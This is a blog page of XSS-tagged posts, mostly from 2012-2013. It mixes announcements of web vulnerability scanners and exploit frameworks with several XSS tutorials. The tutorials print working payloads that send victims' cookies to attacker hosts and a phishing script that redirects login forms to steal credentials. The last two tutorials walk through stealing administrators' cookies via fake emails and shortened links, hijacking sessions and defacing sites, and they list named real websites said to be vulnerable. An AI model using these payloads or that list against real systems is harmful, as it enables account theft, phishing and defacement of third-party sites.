Latest Post
Showing posts with label XSS. Show all posts
Showing posts with label XSS. Show all posts

xssf v2.3- Cross-Site Scripting Framework

Written By Unknown on Tuesday, 19 February 2013 | 00:46


The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation task into a much easier work. The XSSF project aims to demonstrate the real dangers of XSS vulnerabilities, vulgarizing their exploitation. This project is created solely for education, penetration testing and lawful research purposes.

XSSF allows creating a communication channel with the targeted browser (from a XSS vulnerability) in order to perform further attacks. Users are free to select existing modules (a module = an attack) in order to target specific browsers.

XSSF provides a powerfull documented API, which facilitates development of modules and attacks. In addition, its integration into the Metasploit Framework allows users to launch MSF browser based exploit easilly from an XSS vulnerability.

In addition, an interesting though exploiting an XSS inside a victim's browser could be to browse website on attacker's browser, using the connected victim's session. In most of cases, simply stealing the victim cookie will be sufficient to realize this action. But in minority of cases (intranets, network tools portals, etc.), cookie won't be useful for an external attacker. That's why XSSF Tunnel was created to help the attacker to help the attacker browsing on affected domain using the victim's session.

This work is the result of an internship studies conducted for the Faculty of Science and Technology of Limoges (MASTER II Cryptis)within CONIX Security company.

Download latest version updated on 07-feb-2013
XSSF-2.3.zip 1.6 MB

Description: New minor version compatible with last Metasploit Framework 4.6.0-dev. Installed and tested with success on Windows 7 / BackTrack 5r3

Source-

Owasp Xelenium v3 released

Written By Unknown on Wednesday, 23 January 2013 | 00:36

Xelenium is an automation testing tool that can be used to identify the security vulnerabilities present in the web application. Xelenium uses ‘Selenium - Webdriver’ as its engine and has been developed using Java swing.

Selenium – Webdriver is an open source functional testing tool and is very powerful and flexible.

More details on Selenium can be found here- :http://seleniumhq.org/.

Download : Xelenium_v3.jar (25.2 MB)  on 20-jan-2013.
Download Other Version |
Source : https://www.owasp.org/index.php/OWASP_Xelenium_Project

Pre-requisite
Following are the pre-requisites of Xelenium:
1. Mozilla Firefox (versions: 3.0, 3.5, 3.6, 4.0, 5.0, 6, 7) Note: Xelenium works with all the version of Firefox browsers that are supported by Selenium Webdriver. Please refer the Seleniumhq website for up-to-date information.

2. Java 1.6 or above

How it works?

Xelenium captures the details of web pages that are required to be scanned, and during scanning, it performs scan on each of the text fields present in the web page by making http requests to the respective pages.

Http requests are made using Selenium Htmlunit driver and call are made concurrently using Java threads.
Steps to use

Following are the steps that need to be followed to perform scan using Xelenium:

1. Download the xelenium.jar file and double click on it. Xelenium will be launched as shown in link below with procedure shown in screenshots - https://www.owasp.org/index.php/OWASP_Xelenium_Project

Xenotix XSS Exploit Framework 2013 v2 Released

Written By Unknown on Thursday, 10 January 2013 | 05:46


Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. This tool can inject codes into a webpage which are vulnerable to XSS. It is basically a payload list based XSS Scanner and XSS Exploitation kit. It provides a penetration tester the ability to test all the XSS payloads available in the payload list against a web application to test for XSS vulnerabilities. The tool supports both manual mode and automated time sharing based test modes. The exploitation framework in the tool includes a XSS encoder, a victim side XSS keystroke logger, an Executable Drive-by downloader and a XSS Reverse Shell. These exploitation tools will help the penetration tester to create proof of concept attacks on vulnerable web applications during the creation of a penetration test report.

Features:  
  • Built in XSS Payloads
  • XSS Key logger
  • XSS Executable Drive-by downloader
  • Automatic XSS Testing
  • XSS Encoder
  • XSS Reverse Shell (new)
Download Xenotix XSS Exploit Framework 2013 v2
Xenotix_XSS_Exploit_Framework_2013_v2.zip‎ (file size: 4.31 MB, MIME type: application/zip)

Warning: This file type may contain malicious code. By executing it, your system may be compromised.
Version 2
Upgrades 500 + XSS Payloads XSS Reverse Shell
.NET Framework is Required.


Source-
https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework
http://hack-tools.blackploit.com/2012/11/xenotix-xss-exploit-framework-2013-v2.html#.UO7FnuSORMg
https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip

XSS and Cookie Handling Vulnerabilities Identified on HTC Website, Allows Attacker to Hijack Account

Written By Unknown on Friday, 28 December 2012 | 10:54

16-year-old security researcher Thamatam Deepak has identified a number of three cross-site scripting (XSS) vulnerabilities and a cookie handling flaw on the website of world-renowned smartphone manufacturer HTC.

The expert said the vulnerabilities – which affected pages such as product security, account information, and smartphone presentation – have been addressed by HTC after he notified them, according to The Hacker News

If unfixed, the XSS vulnerabilities could have been leveraged by a remote attacker to inject arbitrary content, while the cookie handling flaw might have been exploited to hijack user accounts.

This isn’t the first time when security experts find XSS bugs on HTC’s website. Back in April, researcher Shadab Siddiqui identified similar flaws and reported them to the company.

However, at the time, they failed to respond to his notifications and the vulnerabilities remained unfixed for months.

Gamja : Web vulnerability scanner

Written By Unknown on Wednesday, 19 December 2012 | 05:28

Gamja will find XSS(Cross site scripting) & SQL Injection weak point also URL parameter validation error. Who knows that which parameter is weak parameter? Gamja will be helpful for finding vulnerability[ XSS , Validation Error , SQL Injection].

Download gamja-p4ssion.zip (314.0 kB)

Supported platform
Windows ,Linux,Mac 

Screenshot -













Source-
http://sourceforge.net/projects/gamja/

owasp csrftester - Facilitates Ability to Test Applications for CSRF

Written By Unknown on Friday, 7 December 2012 | 07:12

Java based desktop application that facilitates a pen-testers ability to generate HTML based CSRF attacks.


With the Java-based CSRFTester from the Open Web Application Security Project (OWASP), web applications can be easily tested for such vulnerabilities. Basically, it records a legitimate user session and then uses it to build web sites that try to trigger the same actions again.
CSRFTester is relatively easy to use. Once the archive is unpacked, it can be started up using run.bat and entered in the browser as a proxy (by default, the program does its eavesdropping on port 8008), at which point web sites can be called up and used as normal.
Download -
Click here to download the latest OWASP CSRFTester 1.0 binary and startup script.
Click here to download the latest OWASP CSRFTester 1.0 source and binary.
Click here to download the author's presentation at the 2007 OWASP conference in San Jose about the dangers of CSRF and a brief description of both CSRF Guard and CSRF Tester.


Source-
Website -



How to: Exploit an XSS

Written By Unknown on Wednesday, 14 November 2012 | 14:38


If you aren’t familiar with the basic concept of an XSS vulnerability, I recommend that you read my previous post
 The basics of Cross-site Scripting (XSS).


Now that we’ve got the different XSS types down, let’s head into what an attacker could use them for. After all, an XSS is basically injecting script or HTML into a webpage, how bad could it really be? Let me tell you;

The Session Hijacking attack.

This attack will use JavaScript to steal the current users cookies, as well as their session cookie.
An attack vector for this kind of attack could look something like this:
<script>document.InnerHTML += "<img src='http://evildomain/?cookie="+document.cookie+" />";</script>
Let’s break this payload down. It uses a script tag to append an image to the current page. When the browser loads the image, the victim will send his cookies to evildomain where the attacker stores the victims cookies.

Cool. So now the attacker has all the cookies of his victim, what now? This is where the attacker forges his cookies to look identical to the victims, fooling the server to think that the attacker is the victim and by that, using the victims session to be logged in on the website. The session is hijacked by the attacker, hence the name “Session Hijacking”. There is however a flag that you can set on your cookies called HTTPOnly, which makes the cookies unreachable from client-side scripts. More about that in my next post, let’s move on!

The phishing attack

This attack will use Javascript, CSS or HTML to fool the victim to log in. The basic concept is to overwrite the HTML of the current page to look identical to the login page. Little does the victim know, his credentials are sent to the attacker instead of to the website when he/she tries to log in.
An attack vector for this kind of attack could look something like this:
<script src="http://evildomain/phishing.js"></script>
So what does this payload do? Well, it injects a script tag that will load the script located at “http://evildomain/phishing.js”.
Let’s take a look at what phishing.js could contain:
//Function for overriding the HTML
function override(url){
var req = new XMLHttpRequest();
req
.open('GET', url,false);
req
.onreadystatechange = function(){
if(req.readyState == 4 && req.responseText != ""){
document
.innerHTML = req.responseText;
}
}
req
.send(null);
}

//Override page HTML
override("/login.php");

//Spoof URL
history
.pushState({he: "he"}, document.getElementsByTagName("title")[0].innerHTML, "login.php");

//Hook forms
var forms = document.getElementsByTagName("form");
for(index=0;index<forms.length;index++){
void(forms[index].action = "http://evildomain/logpasswords");
}
Whoa, a lot bigger than the previous payload! To put it in simple terms this script has three stages
:
  1.  Overwrite the current page with the content of the “login.php” page, making it look like the victim is located at the login page (The page will look like the login page).
  2. Overwrite the current URI with “/login.php”, making it look like the victim is located at the login page (The URL bar will look like /login.php).
  3. Overwrite all forms so that when the victim logs in, it will submit their credentials to “http://evildomain/logpasswords”.
Okay, so an attacker could fool users to give them their credentials or they could steal their session and be logged in as the victim. What else could an attacker do?

Custom attacks
Depending on what information about the victim the vulnerable website has stored, a lot of different scenarios could come in play. Let’s pretend the website has a private messaging system. The attacker could then forge a payload to read all of the victims private messages, or even send them as the victim! The scope of custom attacks is only limited by the imagination of the attacker, however if he lacks the imagination, there’s ready-made frameworks for exploiting XSS to it’s fullest! One of the most, if not the most, popular is called The Browser Exploitation Framework or just, BeEF.

Framework-based attacks
There are tons of different attacks that an attacker could pull out of his sleeve with the help of a framework like BeEF, but to name a few (don’t worry, I’ll explain them further down);
  1. Steal cookies
  2. Redirect the victim to a URL of the attackers choice
  3. Mine details about the victims browser
  4. Launch a Man-In-The-Browser attack
  5. Launch browser exploits

So, the classic session hijacking and phishing attack is implemented already in the framework, but what about the others? Let’s quickly go through them.
Redirect the victim to a URL of the attackers choice
This attack is more or less self-explanatory. The attacker can redirect the victim to any URL of his choice, it could be their own site filled with ads or just whatever they like.

Mine details about the victims browser
A lot of info can be gathered about the victim, such as what browser they are using or depending on what browser they are using, what websites they have visited. In some browsers, the attacker can also steal whatever the victim has stored in their clipboard (What info they currently have copied).

Launch a Man-In-The-Browser attack
A Man-In-The-Browser attack is an XSS that follows the victim around until they close the tab/window. This means that even if they navigate away from the page that had the XSS vulnerability, the attacker is still in control of the user, prolonging his attack time.

Launch browser exploits
BeEF has integrated with another framework for exploiting software bugs called MetaSploit, so an attacker could first fingerprint info about the user and then launch an exploit towards the browser they are using. In a worst case scenario this means that the attacker could get full access to the victims computer. From an XSS vulnerability. Creepy stuff!

All of these examples represent just a fraction of what an attacker could do with an XSS vulnerability. Rather than seeing XSS vulnerabilities as harmless, we urge developers to recognize the potential risks involved and take measures to mitigate them. I mean, if Google will pay up to $3,133.7 for a single XSS vulnerability, that has to mean it’s pretty bad right?

Questions? Did we miss something? Hit us up @detectify or hello@detectify.com!

By: Mathias Karlsson

Snuck v0.1 - Automatic XSS filter bypass

Written By Unknown on Tuesday, 23 October 2012 | 07:03

snuck is an automatic tool whose goal is to significantly test a given XSS filter by specializing the injections on the basis of the reflection context. This approach adopts Selenium to drive a web browser in reproducing both the attacker's behavior and the victim's.

snuck is an automated tool that may definitely help in finding XSS vulnerabilities in web applications. It is based on Selenium and supports Mozilla Firefox, Google Chrome and Internet Explorer. The approach, it adopts, is based on the inspection of the injection's reflection context and relies on a set of specialized and obfuscated attack vectors for filter evasion. In addition, XSS testing is performed in-browser, a real web browser is driven for reproducing the attacker's behavior and possibly the victim's.
Download -
snuck-0.1.zip - updated version on 23-oct-2012
Executable jar and malicious payloads 
This release is the same as the "first release", it just includes the required files for licensing purposes - which were missing - and a brief README.

snuck.zip - older version

Source -

Tutorial -

Screenshot -


Basics of XSS injection [Beginner Tutorial]

Written By Unknown on Saturday, 20 October 2012 | 18:50


What is Cross Site Scripting:

XSS Stands for Cross Site Scripting, xss is a vulnerability that is normal found
in a web app. XSS allows the user to inject malicious codes such as HTML and
Java script. XSS can be used to steal cookies, make phishing pages and
just having some fun with the website.


What is A cookie:

A cookie is a text-only string that gets entered into the memory of your browser.
This value of a variable that a website sets. If the lifetime of this value is set
to be longer than the time you spend at that site, then this string
is saved to file for future reference.


What can XSS do:

Cross Site Scripting is used commonly now days in the cyber
world. XSS can take down most websites that are up to date,
Cross Site Scripting can steal cookies from websites/forums.
Make pop ups, appear were there not suppose to "search bars"
etc. Or you can even do some very malicious codes such as
redirect the website to another one.


Hacking forums/guest books with XSS:

Forum Hacking: Now in order to defaced or even attempt
to hack a forum. The forum must have HTML enabled, so you can
enter some malicious codes. If the forum does have HTML enabled
then you can enter codes such as;


Code:
<html>
<head><title>XSS tut by war10rd for AHian </title></head>
<body>
<img src="javascript:alert('Defaced By: ')">
</body>
</html>

If the forum allows the imagen tags then you can use this tag to
steal peoples cookies.

Code:
<img src="javascript:window.location=&amp;#39;http://www.url.com/steal.php?account=&amp;#39;+document.cookie&quot;>


Now to get to guest book hacking when your posting on the guest book
it must also be vulnerable. Meaning html must be enabled, to see if html
is enabled put these tags in your post <B>hello world</B> and if your
text comes back bold. Then html is enabled now try doing other techniques
you can also put some java script inside the html and see if that works.
And if it does or if it doesn't you can still deface the guest book with writing
up some cool html codes that take up the whole guest book page.


Defacing Websites with Cross Site Scripting:

Till now you AHian know Cross Site Scripting is used alot now days to exploit
websites and forums.Mostly search functions etc. Now some of the common XSS'es now days are within the search bars for websites. To make a box pop
up saying what every you put in the script. Some XSS codes are;


Code:
<script>alert("1337`")</script> <BODY ONLOAD=alert(document.cookie)>"><script>alert(1337`);</script> <script>window.document.write("<input type='file'>");</script> <a rel='nofollow' href='search?searchterm=<b>war10rd made you click on link</b>'>war10rd`</a>


Now how can I deface a website with just making 1 little pop up on
the search bar page? You can redirect the site to your website or your friends or you can steel cookies. Make a html defacement page and put the whole code
in your script. You can do many things, with java script on a vulnerable
website.

Credits@!eKO

safe3wvs - One of the most powerful web vulnerability scanner with AI spider crawling technology

Written By Unknown on Tuesday, 2 October 2012 | 03:15

Safe3WVS is one of the most powerful web vulnerability scanner with AI on-the-fly web spider crawling technology helps to identify known and unknown vulnerabilities within the Web application layer.Especially when scans web portals ,you will find it is the most fast tool to dig vulnerabilities such as sql injection, cross-site scripting, upload vulnerability, and more.

Features:
  • Full support for BasicDigestNTLM http authentications.
  • Intelligent web spider automatic removes repeated web pages,this is one reason why it is so damn fast.
  • SQL injection state scanning technology can find vulnerabilities even when WAF or HIPS protectes the site.
  • An automatic javascript analyzer allows for extracting urls from AjaxWeb 2.0 and any other applications.
  • Support to scan SQL injectionXSSupload vulnerabilityadmin pathpotential vulnerabilitydirectory list vulnerability and any other vulnerabilities such as svn information leakage.
Download - Safe3WVS-8.1.rar

Safe3WVS need to download and install:

.NET Framework 2.0 or above needed to install
Safe3WVS English Free Version v10.1
Safe3WVS ไธญๆ–‡ๅ…่ดน็‰ˆ v10.1

For latest business version v13.1,please contact us:
Email:safe3q@gmail.com

Source -

Screenshot -

Ra2-dom-xss-scanner - Blackbox DOM XSS Scanner

Written By Unknown on Wednesday, 26 September 2012 | 07:27

Ra.2 - Blackbox DOM-based XSS Scanner is our approach towards finding a solution to the problem of detecting DOM-based Cross-Site Scripting vulnerabilities in Web-Application automatically, effectively and fast.

Ra.2 is basically a lighweight Mozilla Firefox Add-on that uses a very simple yet effective and unique approach to detect most DOM-based XSS vulnerabilities, if not all.

Being a browser-add on its a session-aware tool which can scan a web-application that requires authentication, although the user needs to manually needs to authenticate into the application, prior to scanning. Ra.2 uses custom collected list of XSS vectors which has been heavily modified to be compatible with its scanning technology. The add-on also implements basic browser intrumentation to simulate a human interaction to trigger some hard to detect DOM-based XSS conditions.


Features - 
False positive free by design: Vulnerable URLs are saved in DB, if and only if, our payload is executed successfully by the browser. Hence marked exploitable. If isn't false-positive, it's a bug! Report us :-)
Large collection of injection vectors, includes “modified” R’Snake’s vectors as well.
Supports transforming Unicode characters for testing content aware application.
Automatically handles JavaScript obfuscation/compression, as it relies on native interpreter.
Fast and light-weight.
Pretty easy learning curve. Point-n-Click.
Basic browser automation support: Simulates some of the browser events that require human interaction to trigger the XSS condition. Example:
<a href="javascript:alert(/XSS/)>Click here</a>
 type="button" value="Continue" onclick="javascript:alert(/XSS/) />
and similar scenarios.
Centralized reporting: Suitable for enterprise standard multi-user environment.

Installation :

1. Download the "ra.two.xpi" file and install it within Mozilla Firefox. We have tested it to be working fine on Mozilla Firefox Version 3.6.0 running on Windows 7 64bit. Your mileage may vary.

2. Download the archive "vectors.zip". Extract the contents ("xss.txt") to a folder. Rename the folder "xss" and copy it to the root of "C:". The resulting path should be "C:\xss\xss.txt".

3. Download the archive "reporting-tool.zip". Extract the contents to the webroot of your Apache server. We have tested it using the XAMPP package (http://www.apachefriends.org/en/xampp.html). In our case the path is "C:\xampp\htdocs\xss\"

4. Finally import the database schema to the MySQL via phpMyAdmin, required for the reporting tool.

5. The tool should be ready to use. If you find anything not working or buggy, please email us or raise a ticket at http://code.google.com/p/ra2-dom-xss-scanner/issues/list


Download -
ra2-osx-mLion.zip - [MacOS X] Ra.2 DOM XSS Scanner - Mozilla Add-On Source & Installer
Download other version s-

Source -


WebCruiser - Web Vulnerability Scanner, SQL Injection Tool !

Written By Unknown on Thursday, 20 September 2012 | 04:38

WebCruiser - Web Vulnerability Scanner, an effective and powerful web penetration testing tool that will aid you in auditing your website! It has a Vulnerability Scanner and a series of security tools.

It can support scanning website as well as POC (Proof of concept) for web vulnerabilities: SQL Injection, Cross Site Scripting, XPath Injection etc. So, WebCruiser is also an automatic SQL injection tool, an XPath injection tool, and a Cross Site Scripting tool!

Key Features:
* Crawler(Site Directories And Files);
Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection etc.;
* SQL Injection Scanner;
* SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept);
* SQL Injection for SQL Server: PlainText/Union/Blind Injection;
* SQL Injection for MySQL: PlainText/Union/Blind Injection;
* SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection;
* SQL Injection for DB2: Union/Blind Injection;
* SQL Injection for Access: Union/Blind Injection;
* Post Data Resend;
* Cross Site Scripting Scanner and POC;
* XPath Injection Scanner and POC;
* Auto Get Cookie From Web Browser For Authentication;
* Report Output.
System Requirement: Windows 7\Vista, or Windows with .Net Framework 2.0 or higher
Download WebCruiser - Web Vulnerability Scanner
Source-

Complete XSS Tutorial

Written By Unknown on Saturday, 15 September 2012 | 15:23

XSS is in 2 ways, Persistent and Non-Persistent type.

For XSS we will use something called a cookie catcher.
Question will be that why we would need someone else's cookie?
The answer is that we can change our browser's cookies to login as them!!! So lets call it Session Hijacking 

First go to a free hosting site like http://www.110mb.com or other php hosting sites and register there. Then download this cookie catcher and upload it.

Cookie Catcher: http://adf.ly/Tdbm


What does the cookie catcher do?
It grabs the user's:

  • Cookies
  • IP
  • Referral link which what page it got to that link
  • Time and Date



Get Vulnerable sites:

Ok first we need sites that are vulnerable to XSS so it will work on them.
To test it we will need to add a code after the link.
I will use this site that many of you probably saw it before.
http://adf.ly/Tdo3

Now for testing if a site is vuln or not you can add these codes:

Code:
"><script>alert(document.cookie)</script>
Code:
'><script>alert(document.cookie)</script>
Code:
"><script>alert("Test")</script>
Code:
'><script>alert("Test")</script>
Or a new one which i found out myself which you can inject HTML:
Code:
"><body bgcolor="FF0000"></body>
Code:
"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>

Then if we see a java script popup like this:

Spoiler 
Or if you used my testing and you saw the page's background go black or a page of google opens in that site means its vulnerable to XSS attacks.

In the end, if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script>




Persistent XSS:

In this method we will grab the victim's cookies with no suspection and completely stealth.
Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.
Ok now lets go to this site: http://adf.ly/Tdo3
Now test and see if the XSS vulnerable test's work on it.
It does!!! And your getting one of the vulnerability's symptoms. So now lets try to grab it's cookies. If there is a box to type and submit it add this:

Code:
<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in???
so they wont suspect you 

Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php search for cookies.html which is a new file that show you the cookies. like if your cookie catcher link would be:
http://www.example.com/cookie catcher.php
the container of the cookies would be:
http://www.example.com/cookies.html

Now visit cookies.html and you would see the session of that cookie! 
PS: the site i used doesn't support cookies so you can use: http://adf.ly/TeZV for cookie supporting.

Now there is another way for a cookie grabbing drive by, add this code and post it:

Code:
<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie)</iframe>
Then post it in the forum or the comment box.
Now this will open a iframe in the page which will allow you to have the same page in that website. If you don't know about iframes make a new html file in your computer and just do a 

<iframe src="www.google.com"></iframe> and you will understand iframes more 

ofc the site Needs to have cookies supported! a blank javascript means you need to go to another site.



Non-Persistent XSS:


Ok in this method we will make the victim admin go to our link. First we will pick a XSS vuln site. For this method we will need a search.php which that page is vuln to XSS and has cookies in that page. In the vuln search.php in the textbox for the word to search for type:

Code:
<script>alert(document.cookie)</script>

and click the search button. If you see a javascript popup means its vuln to Non-Persistent XSS attack. Ok now we will do something similar.
I will use this link for this method: http://adf.ly/TeZV
Now in front of the search.php?search= add this:

Code:
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
Now go to http://www.tinyurl.com and shrink the whole page's link. Try to find a site administrator's E-mail in that vuln website and send a Fake Mail from a online fake mailer like this one: 
http://hackcommunity.com/Thread-Anonymou...to-any-any

Now in the body just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php which you added the code in front of it to him. so the Tinyurl will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does and changes his password you can still login as him 


Session Hijacking:

Ok now you have the admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies from that page. Now go in your cookies.html page and copy everything in front of the Cookie: in a note opened Notepad. The ; separates cookies from each other so first copy the code before the ; .
Now go in that vuln website and clear the link. instead add this:

Code:
Javascript:void(document.cookie="")
or for an example:
Code:
Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")

Then visit the link. Do this with all of the cookies and refresh the page. And wham!!! your logged in as administrator :evil:
So now go in your admin panel and upload your deface page.

Good luck now you hacked a site with XSS 

i share this some vulnerable sites:
Code:
http://www.corpwatch.org/article.php?id=13518"<h1>THIS IS INJECTED TEXT</h1>

http://www.humanevents.com/article.php?id=14965"<h1>THIS IS INJECTED TEXT</h1>

http://www.marshall.org/article.php?id=264"<h1>THIS IS INJECTED TEXT</h1>

http://www.americas-society.org/article.php?id=1409"<h1>THIS IS INJECTED TEXT</h1> Still epic... xD

http://convivea.com/download.php?id=2"<h1>THIS IS INJECTED TEXT</h1>


credit to : 1234hotmaster 
 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Turorial Grapich Design and Blog Design - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger